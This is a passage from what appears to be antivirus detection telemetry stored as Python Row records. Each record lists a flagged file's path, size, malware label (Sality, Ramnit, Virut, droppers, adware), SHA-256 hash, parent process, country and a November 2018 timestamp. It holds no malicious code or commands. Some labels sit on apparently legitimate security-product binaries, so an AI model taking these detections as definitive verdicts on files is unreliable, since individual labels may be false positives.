  Row(detection=Row(filename='beforeghost.exe', filepath='H:\\HBCD\\Programs\\BEFOREGHOST.EXE', filesize=64000, name='TR/Agent.64000.186.#M1.#R1'), hash='eb90c5e7b45131be3382699058912c5f84fa35c868f1202c3acd1ca54cb65080', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='spnativemessage.exe', filepath='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\Surfing Protection Update\\SPNativeMessage.exe', filesize=1460000, name='W32/Neshta.A.#M1.#R1'), hash='fd862b80b8e984b8872cb4e0e7e7429551b1aab5f28c152edaa0beb4538628ba', metadata=Row(cmdline='\\\\\\/c', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=194640, timestamp='2018-11-02T03:52:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tracks.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\TRACKS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='c33053e0f12a1f17fa9b5ad751cec655e0f9ca9ddcf8f1fa47af20229009396f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:27:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\e0ipuqjac3i\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:56:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='! my image.scr', filepath='F:\\! My Image.scr', filesize=0, name='DR/Patched.Ren.Gen.#M2.#R5505'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:42:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='c4c2f4ef16473557538410aa8c176d66062d871792759f4ccd832972eb8586f8', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:45:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\?\\c:\\program files\\bilibili\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:08:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hrl165.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl165.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291cdd', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291cdd', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:00:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b818eb54b8943b689f375c87c8f54abbc05390c2ceaaf737f77be654c732e5f9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B818EB54B8943B689F375C87C8F54ABBC05390C2CEAAF737F77BE654C732E5F9', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b818eb54b8943b689f375c87c8f54abbc05390c2ceaaf737f77be654c732e5f9', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:48:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mpuxsrv.exe', filepath='C:\\Program Files\\Windows Defender\\MpUXSrv.exe', filesize=320000, name='W32/Infector.Gen8.#M300.#R700734'), hash='bfadcb99e116ad6c9a6280aedd9a7c8bb796116a6f14dd90cabab47dec24821c', metadata=Row(cmdline='--engine=2 --session-id=EMe\\\\\\/mWMDFiGz1TKiBMiv1sPh\\\\\\/hmx2iFYSRiOjQXy --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=13460600, timestamp='2018-11-04T09:18:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='adobexmp.dll', filepath='D:\\Program Files\\Adobe\\Acrobat 7.0\\Acrobat\\AdobeXMP.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='bcc6bfb1229f670c8dfd9222478cdfdae1649a19b580b0ce85097826dc8f137d', metadata=Row(cmdline='\\\\\\/I {AC76BA86-2052-0000-7760-100000000002}', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\msiexec.exe', parentsize=73216, timestamp='2018-11-04T12:37:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='84b74c2918260a0cda2e6cb0ba2b2d5013549140', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\84b74c2918260a0cda2e6cb0ba2b2d5013549140', filesize=320000, name='Adware/DealPly.c389db.#M1.#R1'), hash='c389dbd782215ca3380f9352dcbdbbffcbf7b3e7a35f44c4e737342e703c4585', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:45:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00293fb9', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00293fb9', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:33:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00294c82', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00294c82', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:48:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d70bf18515370c41bdfcfa24b1fd553557f713b45b4233051fbfebf3fb2964a2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D70BF18515370C41BDFCFA24B1FD553557F713B45B4233051FBFEBF3FB2964A2', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='d70bf18515370c41bdfcfa24b1fd553557f713b45b4233051fbfebf3fb2964a2', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:51:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150604-cd635048', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-150604-CD635048', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:06:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140805-3287346d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-140805-3287346D', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:08:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:43:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-191426-bb0bc66a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_281e4681\\AVSCAN-20181104-191247-B5520187\\AVSCAN-20181104-191426-BB0BC66A', filesize=604000, name='PUA/Outbrowse.Gen.#M300.#R6338'), hash='f23e365a312e08d20d71fda30a727d4d91ccb32f0ed56d55c745766d44f30013', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:14:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:54:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:42:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ftx global vector configuration tool - - copy.exe', filepath='c:\\program files (x86)\\microsoft games\\microsoft flight simulator x\\orbx\\ftx_vector\\ftx global vector configuration tool - - copy.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T14:11:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00252626', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00252626', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:45:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gsxmli0290.dll', filepath='C:\\Program Files (x86)\\Common Files\\Trimble\\Remote Device Manager\\Converter\\GSXMLI0290.dll', filesize=2368000, name='W32/Ramnit.CD.#M1.#R1'), hash='faca802404d1a4598e9027c0fb062a86d0d6658fe6fe15742f78b07a6cf707af', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:27:03Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T06:53:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T04:32:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6ef394ae1044c76635af953e313ccf2e791d16e5471a010cc68b5e00aeb33a2f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6EF394AE1044C76635AF953E313CCF2E791D16E5471A010CC68B5E00AEB33A2F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6ef394ae1044c76635af953e313ccf2e791d16e5471a010cc68b5e00aeb33a2f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:17:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-212812-364abe59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c7c86a7c\\AVSCAN-20181102-212445-0265EB6B\\AVSCAN-20181102-212812-364ABE59', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='2856f75836e80cef64f96f94263227ae845897202542f05f4fbf00f1b215b97e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:28:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T16:45:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090234-3aa351f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-090234-3AA351F4', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='1af0128ee50ef35648af4037eaa25482a5787113dff2480b798c1dcb78d285bf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:04:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:08:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0016767.exe', filepath='\\\\?\\L:\\System Volume Information\\_restore{AE0778D3-AEE6-4B14-9393-AA69173A7867}\\RP27\\A0016767.exe', filesize=9216000, name='TR/Crypt.XPACK.Gen3.#M300.#R200067'), hash='67e7f0a1f3684b68df9f06796401bc4a390938caacc48c682c313901ba2fd50f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:15:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='org.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\VOICE\\ORG\\ORG.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2a00852fb0394596bbbff9ea372f6fc734b90bc5e4d48c33cca9bc944e313232', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2A00852FB0394596BBBFF9EA372F6FC734B90BC5E4D48C33CCA9BC944E313232', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2a00852fb0394596bbbff9ea372f6fc734b90bc5e4d48c33cca9bc944e313232', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:12:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flame painter.exe', filepath='C:\\Users\\X\\Documents\\WeChat Files\\chenting306536\\Files\\Flame Painter.exe', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline='Files (x86)\\\\\\\\360\\\\\\\\360safe\\\\\\\\safemon\\\\\\\\WDSafeDown.exe \\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\wdF9E1.tmp\\\\\\"', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\360\\360safe\\safemon\\WDSafeDown.exe', parentsize=288864, timestamp='2018-11-02T02:38:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-05-51-21.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T00:00:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140038-5a486fb3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_71d1a4db\\AVSCAN-20181102-140007-54CE7A49\\AVSCAN-20181102-140038-5A486FB3', filesize=896000, name='HEUR/APC.#M1.#R1'), hash='5cae4d902e2d11f0980df6844ecb2606dd2fb0916bd5f744bddd933201d262de', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:05:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~pp78ce.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~pp78CE.tmp', filesize=128000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='3dfb3bcd7618c2bc34a4b30c7062e1d0204afe188d4c326613667d5c1ce30a25', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:12:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T06:44:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bdpdbx25.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Embarcadero\\RAD Studio\\7.0\\bin\\bdpdbx25.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='14286411a9f892fac4ddd456e5d41c0e10c651e976c8045077376ec547485e9f', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:05:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T12:03:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T16:15:12Z'), dt=datetime.date(2018, 11, 2)),
